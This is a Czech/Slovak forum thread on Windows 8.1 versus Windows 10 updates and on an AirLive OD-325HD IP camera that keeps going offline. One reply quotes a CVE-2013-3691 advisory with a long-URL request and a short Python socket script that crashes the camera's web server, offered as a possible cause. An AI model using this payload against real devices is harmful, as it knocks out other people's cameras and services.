Dotaz na IT specialisty a všechny, kteří vládnou PC

[P11]

Ad: Windows 8(.1) a Windows 10. Ak máte Pc s predinštalovanými 8(.1), a prešli ste na W10, odporúčam stiahnuť ISO image tých osmičiek (lepšie ak máte 8.1) preinštalovať a ostať radšej pri nich. Síce interface vyzerá divne, to metro, ale nebudete mať každý polrok nový build ako vo Win10 a tým pádom sa vyhnete možným neočakávaným problémom. Ako IT technik a Windows insider som doma tiež ostal na 8.1

[Liqid]

A nestačilo by zakázat službu W update?

[Prochy68]

A nestačilo by zakázat službu W update?

Jiste

[P11]

Jiste

To nie je to samé. Bez update bude systém deravý. To už radšej staršie 8.1 so záplatami.

[Prochy68]

Ja jsem psal, ze zakazat to lze, to ze potom nebude system aktualizovany z toho tak nejak vyplyva

Upraveno 30. listopadu 2018 uživatelem Prochy68

[Prochy68]

Lze

[lucid]

A nestačilo by zakázat službu W update?

 

 

Jiste

Znám případy, kdy i přes zákaz Windows Update, a to jak v msconfig, tak v nastavení služeb, aktualizace bez problémů proběhne. To ale nyní neřeším: já proti aktualizacím nic nemám, nicméně mi vadí ta sázka do loterie zda aktualizace projde nebo ne a o přístupu Microsoftu, na který skládal oslavné ódy szt. Mně za celou dobu u Win10 aktualizace korektně (s následnými problémy) neprošla asi ve 3-4 případech, ale sebe a ev. bordel či zastaralost mých PC a ntb vůbec neřeším, žena ale měla nové PC, staré deset měsíců a s nainstalovaný pouze legálním sw. Pokud někdo např. ne vlastní vinou natankuje na benzínce špatné palivo a zadře kvůli tomu motor, tak tam zcela jistě odpovědnost za způsobenou škodu bude, tady ale ne, což je podle mne ten šmejdovský způsob jednání: někomu něco vnutím a když se mu to posere, řeknu sorry, tvoje vina...

[Prochy68]

Znám případy, kdy i přes zákaz Windows Update, a to jak v msconfig, tak v nastavení služeb, aktualizace bez problémů proběhne. To ale nyní neřeším: já proti aktualizacím nic nemám, nicméně mi vadí ta sázka do loterie zda aktualizace projde nebo ne a o přístupu Microsoftu, na který skládal oslavné ódy szt. Mně za celou dobu u Win10 aktualizace korektně (s následnými problémy) neprošla asi ve 3-4 případech, ale sebe a ev. bordel či zastaralost mých PC a ntb vůbec neřeším, žena ale měla nové PC, staré deset měsíců a s nainstalovaný pouze legálním sw. Pokud někdo např. ne vlastní vinou natankuje na benzínce špatné palivo a zadře kvůli tomu motor, tak tam zcela jistě odpovědnost za způsobenou škodu bude, tady ale ne, což je podle mne ten šmejdovský způsob jednání: někomu něco vnutím a když se mu to posere, řeknu sorry, tvoje vina...

Jiste, microsoft tam propasoval i dalsi sluzby co inicializuji updaty, z hlavy to nevim, urcite je lze vygooglit. Dalsi moznost bych videl nastavit v registrech cestu na neexistujici wsus server, ale nevim jak je to v jinych edicich nez enterprise, na to uz nemam kapacitu to sledovat :-)

[Sickboy]

Zdravím. Chtěl bych požádat o radu. Mám na baráku IP kameru airlive OD-325HD. Už je to trochu stařena, ale fungovala vždycky v pohodě. Teď se mi po různě dlouhý době odpojí a je konec. Musim vždycky shodit jistič, pak se restartuje a zase funguje. Používám NAS Synology a ten jejich surveillance. Ještě mám otočnou airlive OD-600HD a ta funguje v pořádku. Zkoušel jsem jí hodit do továrního nastavení, odebrat a přidat atd., změnit nastavení datovýho toku, kodeku, ale nic nepomáhá. Teď ještě zkoušim starší FW, ale vypadá to blbě pořád. A myslim, že to neni v NASu. Ta kamera se prostě odpojí a je konec. Nevidim jí ani v NASu ani normálně přes prohlížeč po zadání IP adresy. Po restartu funguje všechno. Někdy se odpojí pár hodinách někdy po pár dnech. Na netu jsem toho moc nenašel. Nepotýkal se s tim někdo? 

[szt]

Kdykoli něco přestane komunikovat, je třeba začít tím že zjistíme na které OSI vrstvě ( https://cs.wikipedia.org/wiki/Referen%C4%8Dn%C3%AD_model_ISO/OSI ) došlo k problému.

 

Tedy, odshora, L7 je to čemu říkáš "Nevidim jí ani v NASu ani normálně přes prohlížeč po zadání IP adresy".

 

Je třeba jít níž.

 

L1: Svítí vůbec na switchi/roueru link příslušném portu?

L2: když si po výkadu zobrazíš na routeru/switch MAC tabulku, vidíš tam adresu kamery ?

L3: Odpovídá kamera na ping ? Co se stane po zadání příkazu ping <ip adresa kamery> ?

L4: Zadej příkaz telnet <ip adresa>mezera <port>, naváže se komunikace nebo ne ?

 

Až zjistíš na které vrstvě to ještě je OK a na které už ne, půjdeme dále. Cokoli jiného je pokus-omyl.
 

Firmware tam nech ten nejnovější, dříve vyhraju ve sportce než potkám aktuální 2018 firmware který by se jen tak odpojoval tam kde jeho předchůdce ne.

 

A napiš sem verze Synology DSM a Survelliance balíčku (jsou to dvě různé věci)
A dále, nevystavil někdo tu kameru napřímo ven do internetu ?

Upraveno 29. prosince 2018 uživatelem szt

[Radek124]

Sorry, ale jestli to chcípá po nějaké náhodné době a (zatím) pomáhá jenom restart kamery, něco v té stařeně pomalu odchází, tipuju že na 99% to souvisí s teplem (napájení, stabilizátory u procesoru a pod.) a ne s "duchařinou" v ISO/OSI (když teda všechno po rebootu funguje)...

[Prochy68]

Jak ji napajis? Ma PoE nebo separatni adapter? Pokud PoE tak switchem nebo injektorem? Jinak souhlas s Radkem124 a mozna to napajeni.

[szt]

"Problém způsobený stárnutím a teplem" nelze vyloučit, ale díky Bohu za elektrikáře kteří jinou možnou příčinu neznají, člověk se pak dostane "za hubičku" k "nefunkčním" kamerám, které pak dalších deset let v pohodě slouží.

 

Poslední nákup "nefunkčních" kamer byl od nešťastníka kterému je jakýsi elektrikář vystavil do internetu no a webserver kamery neunesl když na ni čínský bot poslal více než 50 SYN požadavků. Bylo by bývalo stačilo normálně nastavit firewall, ale majitel věřil více elektrikáři :-)

[Radek124]

2szt: Elektrikář nejsem a sickboye neznám, nicméně v případě chcípajícího Ovislinku z předcloudových dob bych na díry ve firewallu víc než to 1% nesázel...

[pepaa]

Zvládne tu někdo poradit s nastavením Ubiquity PowerBeam, UniFi USG a CloudKey pro domácí síť?

Nedaří se mi přehodit PowerBeam s PPPoE z routeru (bez ztráty přístupu) na bridge a nasadit USG ke stávající síti s CloudKey a AP.

 

 

Sent from my iPhone using Tapatalk

[szt]

Kdybych chtěl nasimulovat náhodné výpadky konkrétně jmenovaného OD-325HD tak jak je sickboy popisuje, z miliardy možností se nabízí třeba Denial of Service díra popsaná v CVE-2013-3691

 

Toto CVE říká:

 

{

 

"Use CVE-2013-3691, DoS by overbuffing path ?/?. A request with a large number of ?a? can take down the http service from the camera device."

_____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won?t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + ?A? * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close()

 

}

 

No a sickboy tvrdí jen to že mu slítnul webserver, tedy že http service je down. O tom zda jsou nebo nejsou down i nižší vrstvy nic neříká, kameru si nezkusil ani pingnout (jak mu radím).

 

Ping je zadarmo a zabere deset sekund, takže i kdyby šance na úspěch byla jedno promile, nevidím důvod proč to nezkusit. Je to skvělá diferenciální diagnostika která rozliší zda se skutečně "elektricky" hryzla, nebo zda ji jen něco softwarově DoSnulo.

Upraveno 30. prosince 2018 uživatelem szt

[cali]

Je to teda vsetko na urovni strielania do vzduchu v nadeji ze trafime orla ako Sam Hawkins, ale keby som si musel tipnut, vsadil by som asi na Radka, nakolko je predsa len o cosi vacsia sanca, ze dlho a dobre fungujuca stara kamera proste odchadza vekom, nez ze ju na konci 2018 niekto zacal hackovat zranitelnostou z polovice 2013.

[Prochy68]

Me by jen zajimalo, jak si predstavujes, ze to ma sickboy doma vyresene, kdyz tu porad argumetujes ddos utoky?

[szt]

Kdybych si měl vsadit u Fortuny (a mou motivací by bylo se trefit za každou cenu, ne to tazateli vyřešit pokud možno s nejmenšími náklady), také bych vsadil na stáří.

 

Ale kdybych chtěl tazateli pomoci tak než ho pošlu rozbíjet prasátko a kupovat novou kameru, poradím mu napřed méně pravděpodobné (ale lehce a zadarmo vyloučitelné) možnosti.

 

Když odvezeš auto do servisu, také nechceš aby to bez diagnostiky řekli že musí vyměnit celý motor protože je starý, že ? Existují určitá diagnostická minima a to že si hryzlou kameru pingnu mi nepřijde přemrštěné.

 

A takovýto DoS funguje na polovinu těchto hraček, to nikdo nemusí útočit selektivně na tazatelovu kameru, prostě bot který náhodně zkouší co kde projde, DoS zkoušející dlouhé URL je evergreen.

 

---

 

A jak si představuji že to má sickboy doma ?

 

No, jedna z možných variant by mohla vypadat takto:

 

Někdo v roce 2012 zapojil kameru, vystavil ji na nějakému domácnostním zyxelu (P660HW DSTNAT) do internetu, všechny možné porty.
Pak v roce 2015 přišlo do módy Synology, koupil Synology, ale ten NAT na kameře už zůstal, na Synology leze přes ten jejich cloud.
No a pak někoho napadlo napsat si bota který proleze IP prostor a bude zkoušet ...
Nebo to ani nemá vystavené ven a jen si dotáhl na domácí PC nějakou infekci která takhle skenuje co najde v místní síti, také nic co bych viděl poprvé.

Upraveno 30. prosince 2018 uživatelem szt

[Prochy68]

Jj, tak ted jsi me pobavil :-)) Ted uz jen sickboy musi rict, jak to tam teda vlastne ma.